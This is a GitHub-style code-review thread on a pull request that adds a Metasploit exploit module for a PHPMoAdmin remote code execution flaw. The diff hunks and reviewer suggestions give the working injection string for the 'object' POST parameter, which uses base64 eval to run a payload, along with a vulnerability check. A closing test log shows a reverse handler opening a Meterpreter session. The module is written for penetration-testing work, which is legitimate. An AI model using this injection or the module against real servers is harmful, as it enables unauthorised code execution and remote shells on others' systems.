### PR TITLE
Add PHPMoAdmin RCE

### PR DESCRIPTION
**Pull request by ricardojba**
Exploit Module for the PHPMoAdmin PHP RCE published on seclist:

http://seclists.org/oss-sec/2015/q1/743
http://seclists.org/fulldisclosure/2015/Mar/19

### CODE REVIEW

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 1]
```diff
@@ -0,0 +1,78 @@
...
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'      => normalize_uri(target_uri.to_s+'moadmin.php'),
```
Comment (jlee-r7) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: This should be 
```ruby
normalize_uri(target_uri.to_s, 'moadmin.php')
```

`normalize_uri` will join with `/` appropriately

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 2]
```diff
@@ -0,0 +1,81 @@
...
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'object'  => "1;eval(base64_decode($_SERVER[HTTP_CMD]));exit"
+      },
+      'headers' => {
+        'Cmd' => Rex::Text.encode_base64(payload.encoded)
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: Is there a reason that you're putting the payload in the header? Why not just put the base64-encoded payload directly in the `object` post value?
``` ruby
'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
```
This gets rid of the unnecessary header and avoids the risk of payload truncation.

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 3]
```diff
@@ -0,0 +1,81 @@
...
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    print_status("Executing payload...")
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: `.to_s` isn't necessary here.
``` ruby
'uri' => normalize_uri(target_uri, 'moadmin.php'),
```

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 4]
```diff
@@ -0,0 +1,81 @@
...
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'object'	=> '1;phpinfo();exit',
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: The execution of `phpinfo()` results in a very large result. Would it not be better to instead use something smaller? For example, you could generate a random value, or a GUID, and have that printed to the output. If the value/GUID appears in the resulting body, then you've got a match. It also means that you're less likely to have a clash with something like "Build Date".

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 5]
```diff
@@ -0,0 +1,81 @@
...
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: `.to_s` isn't necessary here.
``` ruby
'uri' => normalize_uri(target_uri, 'moadmin.php'),
```

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 6]
```diff
@@ -0,0 +1,81 @@
...
+      'References'     =>
+        [
+          [ 'CVE', '2015-2208' ],
+          [ 'EDB', '36251' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch' => ARCH_PHP,
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: Minor indenting issue here.

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 7]
```diff
@@ -0,0 +1,81 @@
...
+    })
+
+    if res and res.body.match(/Build Date/)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: Should we be running check before continuing with exploitation?

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 8]
```diff
@@ -0,0 +1,81 @@
+require 'msf/core'
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: Missing the required comment at the top of the file.

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 9]
```diff
@@ -0,0 +1,81 @@
...
+
+
+class Metasploit3 < Msf::Exploit::Remote
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: `Metasploit4`

File: modules/exploits/multi/http/phpmoadmin_exec.rb [hunk 10]
```diff
@@ -0,0 +1,81 @@
...
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PHPMoAdmin Remote Code Execution',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP command execution vulnerability due to a
+        dangerous use of eval() in PHPMoAdmin.
+      },
+      'Author'         =>
+        [
+          'Pichaya Morimoto pichaya () ieee org', # Public PoC
```
Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: Can you please use the standard name/email format?

File: modules/exploits/multi/http/phpmoadmin_exec.rb (hunk 4 above)
Comment (FireFart) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: i would go for
```
random = Rex::Text.rand_text_alphanumeric(10)
payload with: 1;echo "#{random};exit"
return Exploit::CheckCode::Vulnerable if res and res.body.include?(random)
return Exploit::CheckCode::Safe.
```

Comment (OJ) [inline modules/exploits/multi/http/phpmoadmin_exec.rb]: Exactly the kind of thing I was thinking :)

**Comment by wchen-r7** [comment]
Will give this a try.

**Comment by wchen-r7** [comment]
Good:

```
msf exploit(phpmoadmin_exec) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] Executing payload...
[*] Sending stage (40499 bytes) to 192.168.1.151
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.151:49662) at 2015-03-05 11:18:10 -0600
```

**Pull request merged**